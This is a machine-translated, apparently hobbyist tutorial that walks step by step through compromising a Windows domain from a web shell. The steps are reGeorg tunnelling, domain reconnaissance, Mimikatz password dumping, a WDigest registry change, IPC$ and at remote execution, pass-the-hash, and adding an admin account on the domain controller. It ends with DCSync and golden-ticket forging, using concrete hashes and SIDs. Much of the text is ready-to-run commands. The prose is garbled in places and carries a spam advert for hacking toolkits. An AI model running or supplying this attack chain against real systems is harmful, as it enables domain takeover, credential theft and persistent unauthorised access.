0x01 Basics
Intranet penetration literally means that the Intranet where the target server resides is penetrated and the domain control permission is obtained. To infiltrate the Intranet, you need to obtain a Webshell with low permissions, because you can obtain high permissions through rights promotion.
There is one concept you need to understand before you can do Intranet penetration: the domain environment. There may be hundreds or thousands of machines on the Intranet. For example, you need to upgrade, patch, and set permissions on the machines. The administrator cannot update and modify the machines one by one. Hence the domain environment. The administrator creates a domain using one host as the domain controller, adds all other hosts to the domain, and uses the domain controller to operate other hosts. Due to the high permission of a domain controller, the administrator account and password of the host where the domain controller resides can log in to any host. Therefore, the ultimate goal of Intranet penetration is to obtain the permission of the domain controller.
Start by claiming an account password hacker/1234,abcd, that has administrator privileges. The specific right to carry the process will not be detailed. The following will use the obtained account password with administrator rights to officially start the Intranet penetration practice.
0x02 Intranet Is Penetrated
During penetration testing, we obtained the permission of a server and found that port 3389 was enabled through Netstat-ano. When we tried to connect to the remote desktop, we found that the connection could not be made. This is because the server we obtained is on the Intranet, and port 3389 of the Intranet host is mapped to the public IP address through the port. In other words, port 3389 of our external IP address is mapped to the internal network, not necessarily port 3389 of that server. There are two ways to solve this problem: 1, let the target machine to connect to the network host, there must be a public server, network host to be able to access the Internet) 2, on the target machine set a signal station (put a WEB document on the target machine, all traffic through the file communication) in the process of penetration testing, Intranet hosts will not be able to access the Internet is very common, Method 2 is used to penetrate the Intranet.
1, more than 200 network security series of e-books (should have all) 2, the full set of toolkit (the most complete Chinese version, want to use which use which) 3, 100 SRC source technical documents (project learning, 4, Network security basic introduction, Linux, Web security, attack and defense video (2021 latest edition) 5, network security learning route (bid farewell to not popular learning) 6, CTF capture flag contest analysis (title analysis actual combat operation)
I. Specific process
1. First, we need a tool called Regeorg to build a signal station.
2. The PHP site is used as an example. Upload the tunnel.nosocket. PHP file to the site through the Webshell obtained previously.
3. Run the regeorgsocksproxy. py script in Python to send all data passing through port 3344 to the tunnel.nosocket. PHP file on the target machine.
Python reGeorgSocksProxy. Py - l 127.0.0.1 p - 3344 - u http://192.168.229.151/tunnel.nosocket.phpCopy the code
4. Use the Proxifier tool to configure remote desktop software MSTsc. exe to export data packets from port 3344 on the local PC.
5. Successfully penetrate the Intranet and connect to the target host through the remote desktop.
Other Intranet penetration methods include Frp, Ew, and NPS, which can be used to build a tunnel through the Intranet. They are not detailed here.
0x03 Collecting Intranet Information
1. Use psexec. exe to obtain the SYSTEM permission To collect Intranet information. You need to obtain the SYSTEM permission first.
PsExec.exe -s -i -d cmd
Copy the code
2. Obtain the list of all domain users. Run the net user /domain command to obtain the Intranet domain as ajie.cool, and the domain has Administrator, Guest, KRBTGT, and Web users.
3. Obtain domain user group information. Run the net group /domain command to obtain domain user group information.
4. Obtain the domain Administrator list run the net group “domain admins” /domain command to obtain the domain Administrator list.
5. Obtain the IP address of the domain server You can ping the domain name to obtain the IP address of the domain server. (You can also view the IP address of the DNS server to determine the IP address of the domain server.)
6. Install Nmap for scanning. The Nmap tool is used to obtain Intranet information during Intranet penetration. 1) Upload the Nmap installation package through Webshell first.
2) Remotely connect to the target server and install Nmap to collect Intranet information.
7. Intranet host survival detection can also be carried out by using the NBtscan tool because of the relatively large dynamic and dynamic. Because compared to Nmap’s massive scanning behavior, NBtscan probes based on NetBios, which is equivalent to Windows opening up the network on my computer, are less likely to be detected.
0 x04 Hash to read
Mimikatz is a tool developed by Benjamin Delpy that can read Hash account passwords from memory. It is also a magic tool for Intranet penetration.
Here’s how to read hash passwords stored in server memory using the Mimikatz tool. 1. First open MimiKatz with administrator privileges.
2. Run the privilege::debug command to promote rights.
3. Use sekurlsa::logonpasswords to read the plaintext password of the administrator account in the memory and the password of the local web user.
4. Administrator account for remote desktop login.
0 x05 Hash
First, basic knowledge
This section describes how to read Hash data. If the domain controller administrator logs in to the server using his own domain controller account, the domain controller account and password can be captured. The harm is huge, so during the penetration test, the machines on the Intranet will often patch KB2871997 and modify the registry to turn off Wdigest Auth. So you’re not grabbing a plaintext password. Although ciphertext hashes can still be obtained, they are usually irreversible and require a lot of effort to unlock. In a domain environment, password detection is not done by first decrypting the Hash and then verifying whether the password is correct. Verify that the entered account and password are correct by verifying whether the Hash is the same. In other words, we may be able to forge administrator account and password login by using the Hash obtained, also known as Hash pass, or PTH, by passing the obtained NTLM ciphertext to the machine authenticating the login, bypassing normal authentication to log in to the system.
Second, the Wdigest
The Wdigest function in the registry determines whether there is a plaintext password in the memory. You can check the status of the Wdigest function by viewing the registry key. If the value is 1, the plaintext password is enabled. If the value is 0, the plaintext password does not appear in the memory. To enable or disable Wdigest Auth, run the following command: (1) Enable Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Copy the code
(2) Close Wdigest Auth
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
Copy the code
Third, the IPC $
1, concept,
IPC$(Internet Process Connection) is a resource for sharing “named pipes”, which is open for inter-process communication. By providing trusted user names and passwords, the two connected parties can establish a secure channel and exchange encrypted data through this channel. Thus realize access to remote computer.
Conditions of use of IPC$: open ports 139 and 445; Target IPC$file sharing; Obtain the user account password.Copy the code
On the Intranet, the IPC$shared file service will be enabled by default, and drive C will be shared by default. That is, we can obtain the permission of the target drive C through IPC.
IPC$common command
net use | View the IPC$for the current connection |
---|---|
net use * /del | Delete IPC$connection |
Net use \192.168.1.1\ IPC $password /user: domain \ account | Example Connect to the host whose IP address is 192.168.1.1 in the domain |
Dir \ 192.168.1.1 \ c $ | List the disk C files connected to 192.168.1.1 |
Copy c: / 12. TXT \ 192.168.1.1 \ c $\ 2. TXT | Copy the 12. TXT file from local drive C to drive C at 192.168.1.1 and save the file as 2.txt |
3. IPC$command execution
1. Make plans and execute commands through AT commands.
At \\192.168.1.1 11:15am CMD /c "whoami"Copy the code
2. Make plans through AT commands to execute commands of multiple agents
At \\192.168.100.1 11:15am CMD /c "net use \\192.168.200.1\ IPC $password /user: account"Copy the code
At \\192.168.100.1 11:15am CMD /c "at \\192.168.100.1 11:15am CMD /c "whoami"Copy the code
Four, Hash transfer actual combat demonstration
1. First try to grab the password and find that all the obtained passwords are ciphertext.
2. Although the plaintext password is not obtained, the NTLM of the domain administrator is obtained.
3. Assign the SYSTEM permission and run the net user /domain command to obtain the IP address of the host where the domain management resides.
4. Try to use IPC $to read the directory on disk C of the domain.
5. Hash pass through the Mimikatz tool.
sekurlsa::pth /user:administrator /domain:"ajie.cool" /ntlm:f1de694efa543bb780da59c049541ea3
Copy the code
6. After executing dir \ ad.ajie. cool\c$, a command prompt will pop up.
7, in the command prompt that pops up through PTH through.. / Go to the psexec. exe directory and run the command to obtain the CMD prompt of a domain controller.
8. Run ipconfig. The IP address of the host where the domain controller resides is displayed.
9. Create a user on the domain controller and add it to the administrator group.
10. Log in to the domain controller using the newly created user remote desktop. The remote desktop service cannot be connected.
11. Run the reg command to query the registry. If the remote desktop service is found and 0x01 is returned, the remote desktop service is disabled. (on returns 0x00)
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
Copy the code
12. Use the command prompt of the domain controller to modify the registry and enable the remote service function.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Copy the code
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
Copy the code
13. Log in to the domain controller as user Hackerend.
0x06 Gold Note
First, basic knowledge
In a domain environment, the account and password of the domain controller can be used to log in to any host in the domain. How does the host check the account and password of the domain controller? You can check the account password by asking the domain controller or setting up a third-party center to check whether the account password is correct. In the domain, a third-party center is used to verify that the entered account and password are the same. This third-party center is called the KDC Key Distribution Center. (The following content relates to the kerboros protocol on the Intranet, my younger brother is not very good at school, so I will briefly say.)
Ii. KDC Key Distribution Center
Kerberos Distribution Center (KDC) Maintains the name and hash code (Master Key) of all accounts.
Provides: AS authentication service, TGS bill granting service.
1, the AS
The Authorization Server provides initial Authorization for process 1 above. The user indicates the requirements and encrypts the request with the password. The AS decrypts the request with the password to obtain the request content. Return a TGT (ticket granting Tickets) to the user (encrypted with a password).
2, TGS
Once a TGT is obtained, a Ticket Granting Server (TGS) can be accessed using a TGT.
After the TGS authenticates the TGT (using key decryption), it returns a Ticket to the user. After receiving the Ticket, the user accesses the Server. The Server authenticates the Ticket and KDC, and provides services after passing the Ticket.
3, bills
In Intranet penetration, bills are divided into silver bills and gold bills. The tickets correspond to the tickets of common domain users and domain administrators. Ticket is the Ticket of the Kerberos authentication protocol. After the Ticket is verified by the AS and TGS, you can log in to the destination host at will.
When you query intra-domain users, KRBTGT is always displayed, as shown in Figure 5-37. The KRBTGT account is actually an overmanaged account used by the KDC key distribution center. We took the ticket of KRBTGT account and went to access the machine in the domain. The target owner thought we were the KDC key distribution center and gave us the highest access. Common administrators change the password of domain controller accounts, but few administrators change the password of Krbtgt. In the final stage of Intranet penetration, we need to obtain gold notes to maintain permissions, so here is how to obtain KRBTGT account gold notes.
Three, actual combat demonstration
1. Upload mimiKatz. exe and psexec. exe to the domain controller through the remote desktop.
2. Set PsExec to SYSTEM, and run mimikatz. Enter lsadump::dcsync /user: KRBTGT to obtain the HASH value of KRBTGT.
3. The data required for making gold bills are as follows:
Object Security ID : S-1-5-21-3296092892-1320626564-2720975204Hash NTLM: 31edc56a2302a25a2e9bee5f04abd659
Copy the code
The -502 at the end of the original Object Security ID is used as an identifier, which needs to be manually deleted during production.
4, Exit the remote desktop, in the attack plane through the Mimikatz to make gold notes. After the command is executed, an ad. kiribi file is generated.
kerberos::golden /admin:administrator /domain:ajie.cool /sid:S-1-5-21-3296092892-1320626564-2720975204 /krbtgt:31edc56a2302a25a2e9bee5f04abd659 /ticket:administrator.kiribi
Copy the code
5. After the ticket is made, try to obtain the permission of drive C of the domain controller.
Purge the ticket cache using Kerberos :: Purge; Kerberos ::list lists tickets as empty, indicating that all tickets have been cleared.
7. Use Kerberos :: PTT Administrator.kiribi to load the generated ticket.
8. Successfully obtained the permission of disk C of domain controller without password. The following further increase of the permission is similar to the Hash transfer, so the demonstration will not be done.
0 x07 summary
The above is a simple process that I have learned to simply obtain shell from the Internet and directly infiltrate the Intranet through raising or not raising the right. Some concepts are not clearly mentioned, so I hope my Cousins can raise some points. The above is only a personal learning process, may be too simple knowledge points, hope to understand.